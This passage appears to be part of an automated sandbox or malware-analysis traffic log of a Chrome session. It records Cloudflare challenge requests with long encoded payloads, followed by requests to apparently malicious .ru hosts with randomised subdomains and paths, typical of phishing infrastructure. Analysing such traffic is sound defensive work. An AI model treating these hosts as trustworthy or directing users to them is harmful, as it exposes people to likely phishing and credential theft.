                                                            2025-01-15 16:02:10 UTC1369INData Raw: 33 62 4c 43 79 66 4c 75 5a 77 49 42 2f 78 48 71 46 70 72 50 45 77 5a 36 61 6d 4d 6e 4d 71 59 2f 4a 70 71 71 68 79 4a 57 70 6c 4e 47 72 79 4b 66 61 31 35 61 71 32 39 43 79 34 71 33 69 33 4e 36 6d 6f 4e 50 73 6f 38 58 77 35 71 37 75 73 66 53 31 79 63 72 35 38 74 47 78 74 4f 79 37 76 50 59 41 37 4e 33 43 7a 74 6b 49 2f 67 6a 4a 36 65 73 4d 43 41 51 48 42 64 48 70 78 68 50 75 36 52 6e 5a 38 66 59 58 35 76 51 68 48 52 30 66 47 53 54 69 37 67 4d 6f 35 53 6e 36 4b 2f 55 6e 4d 65 62 78 45 79 41 78 4c 67 73 48 42 54 59 35 46 76 73 32 45 78 63 4f 4e 51 49 57 41 54 34 59 4e 52 52 48 52 41 4d 58 43 79 56 42 54 52 73 70 55 56 56 52 55 43 73 51 47 6a 46 52 55 79 59 33 53 46 73 59 47 55 49 30 58 31 39 5a 4d 6d 6b 2b 5a 6a 6c 72 51 57 45 38 63 56 52 68 50 33 4a 66 61 46
                                                            Data Ascii: 3bLCyfLuZwIB/xHqFprPEwZ6amMnMqY/JpqqhyJWplNGryKfa15aq29Cy4q3i3N6moNPso8Xw5q7usfS1ycr58tGxtOy7vPYA7N3CztkI/gjJ6esMCAQHBdHpxhPu6RnZ8fYX5vQhHR0fGSTi7gMo5Sn6K/UnMebxEyAxLgsHBTY5Fvs2ExcONQIWAT4YNRRHRAMXCyVBTRspUVVRUCsQGjFRUyY3SFsYGUI0X19ZMmk+ZjlrQWE8cVRhP3JfaF
                                                            2025-01-15 16:02:10 UTC1369INData Raw: 74 6f 71 2b 75 4c 6d 45 73 73 69 2f 69 4d 61 38 77 6f 79 36 77 5a 36 4f 76 74 54 54 6b 38 4c 4d 32 4a 57 4d 32 4e 53 61 7a 4d 6a 58 6f 4d 2b 32 33 71 4f 38 36 4e 2b 6d 35 71 58 6a 74 75 72 67 35 36 36 6b 38 4f 79 79 7a 50 6a 74 74 2b 62 78 79 72 72 55 76 66 75 2f 32 64 49 41 77 39 77 42 2f 63 59 4a 39 41 50 4b 77 50 77 4a 7a 78 44 6d 45 4e 51 44 43 52 44 69 46 77 30 64 32 76 51 5a 46 74 34 66 46 53 48 69 45 78 72 32 35 64 77 64 4b 4f 77 62 4c 53 62 75 4d 41 63 74 38 69 55 68 4c 76 58 73 2b 54 6a 36 38 45 45 39 2f 76 52 42 50 41 39 44 4e 55 51 48 4e 30 31 46 44 43 55 4b 55 51 38 2f 54 69 4d 53 43 56 6c 52 46 31 64 4a 57 42 73 32 4d 31 6b 67 55 55 31 68 49 32 51 33 5a 53 68 58 61 57 51 74 57 32 6c 77 4f 32 39 6c 62 6a 52 6a 4e 6d 38 32 4c 57 6c 35 50 47 31
                                                            Data Ascii: toq+uLmEssi/iMa8woy6wZ6OvtTTk8LM2JWM2NSazMjXoM+23qO86N+m5qXjturg566k8OyyzPjtt+bxyrrUvfu/2dIAw9wB/cYJ9APKwPwJzxDmENQDCRDiFw0d2vQZFt4fFSHiExr25dwdKOwbLSbuMAct8iUhLvXs+Tj68EE9/vRBPA9DNUQHN01FDCUKUQ8/TiMSCVlRF1dJWBs2M1kgUU1hI2Q3ZShXaWQtW2lwO29lbjRjNm82LWl5PG1
                                                            2025-01-15 16:02:10 UTC1369INData Raw: 4a 4f 57 78 4a 75 42 69 38 53 76 71 62 32 48 70 4c 4f 64 6e 73 33 48 72 38 36 72 74 36 57 6d 31 5a 79 33 31 72 4f 2f 72 61 37 65 77 71 44 64 36 4e 50 65 72 64 62 5a 75 75 69 36 33 4f 71 39 31 39 48 74 77 66 4c 54 79 72 72 71 36 63 6e 30 31 4f 33 4f 2f 4d 37 77 2f 73 62 53 31 39 72 39 44 4f 30 48 32 51 76 72 34 67 77 55 47 41 67 4e 34 75 30 47 30 2f 44 78 2f 42 67 51 4a 41 37 74 2f 76 50 32 49 51 49 4b 49 50 59 6e 44 2b 67 70 49 52 77 70 39 52 6a 32 42 79 2f 77 47 6a 4d 47 4e 77 67 50 4f 45 45 51 45 7a 77 65 4a 6a 67 54 51 78 73 46 52 44 30 34 51 52 49 30 54 69 4e 4b 44 54 5a 50 49 6c 4d 77 4b 30 35 4e 4c 68 6c 56 48 68 70 64 57 56 52 47 58 7a 4a 69 5a 6a 74 68 4b 69 5a 70 5a 55 74 41 51 32 6b 79 4c 6e 42 74 61 46 70 7a 52 6e 64 51 54 33 55 2b 4f 6e 78 35
                                                            Data Ascii: JOWxJuBi8Svqb2HpLOdns3Hr86rt6Wm1Zy31rO/ra7ewqDd6NPerdbZuui63Oq919HtwfLTyrrq6cn01O3O/M7w/sbS19r9DO0H2Qvr4gwUGAgN4u0G0/Dx/BgQJA7t/vP2IQIKIPYnD+gpIRwp9Rj2By/wGjMGNwgPOEEQEzweJjgTQxsFRD04QRI0TiNKDTZPIlMwK05NLhlVHhpdWVRGXzJiZjthKiZpZUtAQ2kyLnBtaFpzRndQT3U+Onx5


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.1649741104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:10 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:11 UTC442INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 15 Jan 2025 16:02:11 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 14
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: spePqiDeKF/4TY7KqyMLuktRJ9blozMB5T9mbTCNfLVX79lCEaPt2jcb9012N0BxXTeuDoco1YYe13oIOvFY8g==$nW4RNLig54vZPL0R48S5Ng==
                                                            Server: cloudflare
                                                            CF-RAY: 902716b33e8ff797-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:11 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                            Data Ascii: {"err":100230}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.1649742104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:14 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 34619
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:14 UTC16384OUTData Raw: 76 5f 39 30 32 37 31 36 39 30 39 39 34 39 31 37 62 35 3d 7a 25 32 62 58 42 49 69 46 53 74 47 2b 4f 2b 4f 33 2b 46 67 46 47 78 39 69 47 4f 53 46 73 4f 31 4f 64 64 2b 46 71 4f 56 42 69 6d 4f 47 4f 4c 75 39 75 6d 46 30 68 4f 62 42 58 74 69 76 44 58 4f 7a 69 4f 69 52 46 56 4f 6e 58 4f 4b 67 24 39 6d 46 43 4f 55 52 65 77 58 47 42 46 53 4f 44 42 67 34 41 75 46 39 6b 53 36 4f 47 6d 6b 36 64 69 64 6b 6b 2b 57 2d 4f 64 6f 67 4f 53 42 72 4e 64 6a 75 4b 6d 4f 68 4f 5a 78 6f 73 33 33 67 72 36 42 46 6c 67 4f 4f 45 75 78 52 4f 53 68 78 4f 69 6d 5a 4a 38 6a 52 51 78 39 46 62 36 37 2b 74 66 4a 4d 67 42 4f 6a 51 36 4c 6b 58 63 39 78 52 4f 75 7a 38 39 36 69 42 24 4f 78 2b 4f 67 47 6d 66 39 38 53 43 79 33 52 75 39 55 70 52 6c 4a 68 42 67 33 57 30 63 6a 61 65 61 45 71 6d 63
                                                            Data Ascii: v_90271690994917b5=z%2bXBIiFStG+O+O3+FgFGx9iGOSFsO1Odd+FqOVBimOGOLu9umF0hObBXtivDXOziOiRFVOnXOKg$9mFCOURewXGBFSODBg4AuF9kS6OGmk6didkk+W-OdogOSBrNdjuKmOhOZxos33gr6BFlgOOEuxROShxOimZJ8jRQx9Fb67+tfJMgBOjQ6LkXc9xROuz896iB$Ox+OgGmf98SCy3Ru9UpRlJhBg3W0cjaeaEqmc
                                                            2025-01-15 16:02:14 UTC16384OUTData Raw: 76 42 46 59 4f 41 4f 38 4f 69 42 75 76 6b 2d 4d 30 6a 72 4f 77 61 67 78 72 6d 46 55 4f 4e 4f 55 53 69 74 4f 24 31 41 6d 6b 41 4f 35 4f 75 7a 46 4d 4f 67 42 7a 58 46 75 58 68 42 6e 74 4f 48 42 58 4f 6b 74 6b 50 4f 38 42 69 52 4f 33 4f 71 67 72 52 69 30 4f 6b 42 72 4f 6b 6e 4f 24 76 67 58 46 34 4f 51 4f 6b 38 4f 42 4f 47 42 72 39 6b 2b 4f 51 42 64 42 6b 2b 4f 70 4f 46 39 69 52 4f 66 4f 43 6d 46 42 4f 6c 4f 6f 42 46 52 39 77 42 67 78 4f 6a 46 38 39 43 73 6b 76 4f 73 2b 7a 42 4f 53 46 30 4f 47 5a 63 52 39 65 4f 51 42 46 78 4f 4e 33 43 39 6b 5a 4f 52 4f 64 42 69 41 46 72 4f 77 39 44 67 46 72 4f 69 58 75 72 6d 46 72 7a 42 4f 78 46 30 4f 55 76 42 42 4f 4a 48 57 66 4f 70 4f 76 4f 67 42 46 74 4f 75 4f 55 58 67 75 4f 4a 6d 44 52 4f 75 4f 6f 72 4f 4c 46 30 4f 71 67
                                                            Data Ascii: vBFYOAO8OiBuvk-M0jrOwagxrmFUONOUSitO$1AmkAO5OuzFMOgBzXFuXhBntOHBXOktkPO8BiRO3OqgrRi0OkBrOknO$vgXF4OQOk8OBOGBr9k+OQBdBk+OpOF9iROfOCmFBOlOoBFR9wBgxOjF89CskvOs+zBOSF0OGZcR9eOQBFxON3C9kZOROdBiAFrOw9DgFrOiXurmFrzBOxF0OUvBBOJHWfOpOvOgBFtOuOUXguOJmDROuOorOLF0Oqg
                                                            2025-01-15 16:02:14 UTC1851OUTData Raw: 44 6d 7a 46 35 44 6e 5a 64 47 44 38 59 44 72 59 72 36 46 38 6e 6f 56 72 6d 4f 6b 4b 59 55 77 53 6d 6b 4f 6d 31 59 2d 38 39 47 5a 39 6b 4e 64 35 55 75 6c 44 39 63 72 33 52 58 6b 49 63 62 6d 47 50 61 30 38 4a 78 5a 39 46 6b 58 69 78 39 47 2d 42 4b 45 36 53 6a 67 42 30 57 6a 2d 35 59 6c 58 6d 41 6f 59 67 35 65 4b 72 5a 70 41 37 38 5a 4f 4f 57 46 52 39 63 67 45 75 6b 65 63 58 67 35 52 69 35 65 70 4f 43 62 33 2b 79 59 57 50 75 6a 44 4f 57 4f 69 44 4c 5a 4f 61 50 2d 67 6b 63 49 6c 75 78 6c 44 44 5a 79 6d 64 59 4f 57 4f 55 6a 64 6a 6b 62 6d 46 49 79 4d 71 66 62 61 67 52 36 24 50 65 52 4f 6e 2b 6b 24 4e 30 55 34 42 69 52 4f 59 64 48 24 38 55 72 79 53 6f 77 2d 34 58 70 57 70 53 6c 42 44 61 7a 79 4e 4e 36 74 63 6d 44 74 46 38 7a 33 24 30 45 68 67 4f 66 39 43 71 61
                                                            Data Ascii: DmzF5DnZdGD8YDrYr6F8noVrmOkKYUwSmkOm1Y-89GZ9kNd5UulD9cr3RXkIcbmGPa08JxZ9FkXix9G-BKE6SjgB0Wj-5YlXmAoYg5eKrZpA78ZOOWFR9cgEukecXg5Ri5epOCb3+yYWPujDOWOiDLZOaP-gkcIluxlDDZymdYOWOUjdjkbmFIyMqfbagR6$PeROn+k$N0U4BiROYdH$8UrySow-4XpWpSlBDazyNN6tcmDtF8z3$0EhgOf9Cqa
                                                            2025-01-15 16:02:14 UTC282INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4624
                                                            Connection: close
                                                            cf-chl-out: 89CQs2WLCGiLiqkmrOZquDzkEnBcC6G/XzqRwGx4/Pow6KNgZY1hjLnmVPXpaYH0vdyUnUvP1ZqZeobNhXdJO47nGHUR3+YOex4epW8OXNI=$go1Y6ZcQJl5euNbOUpx2JA==
                                                            2025-01-15 16:02:14 UTC1191INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 54 6d 6e 66 61 49 71 6f 63 41 36 69 61 53 76 55 76 77 7a 78 59 70 6f 55 74 46 44 36 76 75 59 57 67 5a 67 4a 47 64 4a 6a 53 72 31 62 69 54 59 55 52 55 30 6b 45 31 66 76 4e 76 71 39 39 78 6b 42 69 75 75 75 65 6f 32 2b 77 5a 48 7a 45 68 77 62 77 6b 4e 53 56 71 6c 34 2f 47 4f 6a 61 6a 6a 54 57 46 76 6b 6b 77 41 75 37 46 65 49 53 71 74 68 76 38 65 4a 46 61 45 62 73 73 32 46 72 39 42 74 4b 38 46 52 4d 61 4d 39 31 4e 32 75 53 31 5a 46 6f 63 52 41 46 66 34 53 43 66 45 64 54 33 68 43 6b 44 4f 59 58 61 37 33 44 4d 67 61 4a 56 4e 4c 45 4d 66 41 42 4b 32 2b 30 72 52 57 47 7a 35 30 30 53 47 63 71 57 57 63 35 52 64 6d 62 31 6f 6e 39 4f 70 66 4e 6e 49 47 6d 6f 71 45 36 53 43 4a 38 6d 56 49 2f 44 72 67 73 39 43 63 7a 37 50 6f 75
                                                            Data Ascii: cf-chl-out-s: TmnfaIqocA6iaSvUvwzxYpoUtFD6vuYWgZgJGdJjSr1biTYURU0kE1fvNvq99xkBiuuueo2+wZHzEhwbwkNSVql4/GOjajjTWFvkkwAu7FeISqthv8eJFaEbss2Fr9BtK8FRMaM91N2uS1ZFocRAFf4SCfEdT3hCkDOYXa73DMgaJVNLEMfABK2+0rRWGz500SGcqWWc5Rdmb1on9OpfNnIGmoqE6SCJ8mVI/Drgs9Ccz7Pou
                                                            2025-01-15 16:02:14 UTC1265INData Raw: 52 6b 4e 39 68 34 56 4d 6a 56 71 52 5a 6c 4a 67 6a 70 57 44 65 46 68 74 69 4a 57 61 68 35 42 68 6f 58 56 66 64 49 53 6a 71 4a 36 67 61 4b 79 58 71 34 2b 78 71 33 74 72 71 61 2b 78 69 49 35 7a 74 34 79 53 64 37 79 35 71 4a 7a 41 67 4c 7a 42 6a 33 2f 4a 77 38 57 7a 79 5a 62 4c 79 4d 79 52 79 38 75 69 68 35 2b 50 31 64 50 53 30 35 71 6f 32 35 32 61 72 61 75 62 6f 74 2f 64 70 4e 57 30 34 39 50 63 70 2b 76 48 32 39 79 77 78 73 72 71 38 39 2b 31 7a 2f 6a 6c 32 72 33 38 76 4c 6e 39 79 37 7a 50 41 41 4c 5a 41 74 51 43 79 4d 6b 42 44 50 66 38 42 77 2f 38 45 64 58 66 7a 38 34 55 45 78 58 4f 7a 78 4d 49 43 68 37 73 45 79 45 65 45 67 55 5a 46 68 51 4b 49 79 59 5a 41 67 37 38 38 53 76 73 4a 53 6e 31 4a 67 77 4a 2b 44 54 31 4c 76 67 67 50 44 73 38 48 7a 67 39 51 51 4d
                                                            Data Ascii: RkN9h4VMjVqRZlJgjpWDeFhtiJWah5BhoXVfdISjqJ6gaKyXq4+xq3trqa+xiI5zt4ySd7y5qJzAgLzBj3/Jw8WzyZbLyMyRy8uih5+P1dPS05qo252araubot/dpNW049Pcp+vH29ywxsrq89+1z/jl2r38vLn9y7zPAALZAtQCyMkBDPf8Bw/8EdXfz84UExXOzxMICh7sEyEeEgUZFhQKIyYZAg788SvsJSn1JgwJ+DT1LvggPDs8Hzg9QQM
                                                            2025-01-15 16:02:14 UTC1369INData Raw: 66 34 61 47 45 41 7a 52 52 56 45 48 6b 68 4d 53 77 31 46 52 68 73 37 4c 6b 55 66 51 42 55 70 46 78 67 36 55 46 6f 77 54 47 46 54 54 78 34 78 58 57 41 36 4f 46 78 6b 4f 6c 63 33 55 45 4a 71 61 31 52 6f 62 6e 4e 4c 51 6d 52 78 5a 55 35 72 63 44 46 30 59 58 64 41 55 6e 2b 44 66 59 52 39 67 58 53 41 53 34 64 6c 54 55 79 50 5a 6f 52 56 6c 57 32 51 68 49 39 72 6b 5a 6d 55 63 59 79 57 6d 56 57 52 70 4b 52 69 5a 59 69 61 66 58 71 6f 70 5a 68 70 63 4b 79 55 5a 6f 65 6f 6a 6f 71 6f 74 58 6c 75 73 4c 4a 38 73 4b 7a 42 75 35 66 46 67 34 57 53 67 34 65 54 71 71 62 44 78 37 6d 63 79 38 76 41 70 4e 50 4f 78 63 2f 58 73 63 6a 48 30 4e 75 64 30 4e 7a 4d 30 64 7a 64 76 64 54 44 33 4f 6e 4b 6e 2b 33 5a 7a 37 6e 77 33 63 62 73 37 2f 48 4b 74 2f 4c 6b 2b 4e 4c 35 75 72 33 36
                                                            Data Ascii: f4aGEAzRRVEHkhMSw1FRhs7LkUfQBUpFxg6UFowTGFTTx4xXWA6OFxkOlc3UEJqa1RobnNLQmRxZU5rcDF0YXdAUn+DfYR9gXSAS4dlTUyPZoRVlW2QhI9rkZmUcYyWmVWRpKRiZYiafXqopZhpcKyUZoeojoqotXlusLJ8sKzBu5fFg4WSg4eTqqbDx7mcy8vApNPOxc/XscjH0Nud0NzM0dzdvdTD3OnKn+3Zz7nw3cbs7/HKt/Lk+NL5ur36
                                                            2025-01-15 16:02:14 UTC1369INData Raw: 6b 33 47 69 30 4e 4b 44 6b 37 51 52 41 6d 53 41 39 56 55 53 35 55 56 31 52 64 4b 31 70 48 55 43 45 72 54 46 45 76 59 6c 46 52 4e 32 64 56 52 69 74 72 54 43 68 69 59 6d 77 75 52 30 51 30 62 7a 46 71 61 6c 6b 38 61 55 39 72 55 30 42 56 4e 6a 2b 45 67 58 42 71 67 6f 56 61 59 49 78 34 54 55 2b 50 65 31 47 45 6b 34 57 4f 67 6f 57 52 63 34 68 2b 57 70 42 68 6f 56 78 33 6e 35 36 67 59 61 4f 6e 6c 59 61 70 64 32 61 68 71 36 32 63 6f 59 43 31 6e 37 47 48 74 36 4e 35 66 5a 32 64 6c 70 2b 38 67 71 2b 31 68 4a 53 42 76 6f 65 35 70 72 76 4b 76 4a 2b 66 30 63 32 6d 6a 35 58 41 71 71 2f 52 30 38 79 32 32 72 44 4d 32 39 4b 56 31 64 76 61 70 4d 4b 6f 34 39 6e 4b 35 2b 66 58 79 37 32 77 36 2f 44 77 37 4b 6e 73 31 50 6e 78 37 66 58 7a 39 39 36 2f 76 2f 7a 78 41 51 58 61 76
                                                            Data Ascii: k3Gi0NKDk7QRAmSA9VUS5UV1RdK1pHUCErTFEvYlFRN2dVRitrTChiYmwuR0Q0bzFqalk8aU9rU0BVNj+EgXBqgoVaYIx4TU+Pe1GEk4WOgoWRc4h+WpBhoVx3n56gYaOnlYapd2ahq62coYC1n7GHt6N5fZ2dlp+8gq+1hJSBvoe5prvKvJ+f0c2mj5XAqq/R08y22rDM29KV1dvapMKo49nK5+fXy72w6/Dw7Kns1Pnx7fXz996/v/zxAQXav
                                                            2025-01-15 16:02:14 UTC621INData Raw: 46 48 6b 63 6c 49 30 77 56 55 41 6f 76 56 78 6b 5a 4c 46 55 61 59 46 68 54 4e 43 38 7a 56 31 41 79 50 57 52 6e 4b 57 74 6e 57 44 39 71 5a 53 39 68 62 58 52 4f 52 33 56 77 4c 58 42 72 66 46 41 35 4f 33 68 57 54 6e 61 46 63 58 47 49 53 58 52 46 68 59 4e 4b 69 45 2b 4b 52 59 47 50 6a 6f 39 6e 6d 56 68 72 6c 57 65 64 62 35 78 78 59 59 75 43 59 32 52 33 59 6e 47 67 6a 4a 69 58 71 6d 32 43 67 58 47 72 63 58 47 79 61 62 69 4c 65 61 57 57 6c 72 43 35 6d 38 47 36 76 59 2b 4e 76 73 47 62 79 5a 4f 7a 6e 72 6a 49 74 36 43 65 7a 4b 50 45 6c 64 54 42 77 61 47 6a 78 4a 6d 79 32 38 65 2b 77 74 54 61 32 4b 44 69 75 70 72 63 70 2b 53 70 71 37 66 42 71 61 2f 6b 33 63 71 76 37 2f 43 78 74 2f 44 4e 36 4e 66 38 35 38 76 50 2f 75 7a 57 31 41 45 41 43 74 66 47 78 2f 37 5a 79 2f
                                                            Data Ascii: FHkclI0wVUAovVxkZLFUaYFhTNC8zV1AyPWRnKWtnWD9qZS9hbXROR3VwLXBrfFA5O3hWTnaFcXGISXRFhYNKiE+KRYGPjo9nmVhrlWedb5xxYYuCY2R3YnGgjJiXqm2CgXGrcXGyabiLeaWWlrC5m8G6vY+NvsGbyZOznrjIt6CezKPEldTBwaGjxJmy28e+wtTa2KDiuprcp+Spq7fBqa/k3cqv7/Cxt/DN6Nf858vP/uzW1AEACtfGx/7Zy/


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.1649743104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:14 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:14 UTC442INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 15 Jan 2025 16:02:14 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 14
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: ZMgGUiWHyFJMpSYIvnH1ZxiZfsK6IPepqHRmundH1cwbWZEl+wJeWjR0IocrJpND013Me2OVL/qPwybq4HpgEQ==$73n0mFBg1jZ4hmOtq/5iww==
                                                            Server: cloudflare
                                                            CF-RAY: 902716caff0f80d9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:14 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                            Data Ascii: {"err":100230}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.1649744104.21.48.14436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:14 UTC686OUTGET /pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWK HTTP/1.1
                                                            Host: 1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://mstn.qomitarnor.ru
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://mstn.qomitarnor.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:15 UTC894INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvVBRF6aqFGVLksJLpyeIM9ZbYxCrRX%2BrmI%2BsQIyk8qAu9vrdj1DReGBfXjidEmI3AAm%2BzxtlSMEphKpOp%2FnqN48F9NZeAPNb3Mirt%2FPKFszjr2ijzyeMWTcFdxhPAWrpK1QSxN5iv98e9foAdXf6J1EAZsftwnNgphVHboOBynwGBlyDPZlRxQ7e6wndEAPtvfC7NgS7uA8"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 902716cbd871c323-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1672&rtt_var=807&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1264&delivery_rate=1746411&cwnd=214&unsent_bytes=0&cid=b2213ff164304793&ts=615&x=0"
                                                            2025-01-15 16:02:15 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-15 16:02:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.1649748104.21.112.14436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:16 UTC476OUTGET /pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWK HTTP/1.1
                                                            Host: 1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:17 UTC894INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
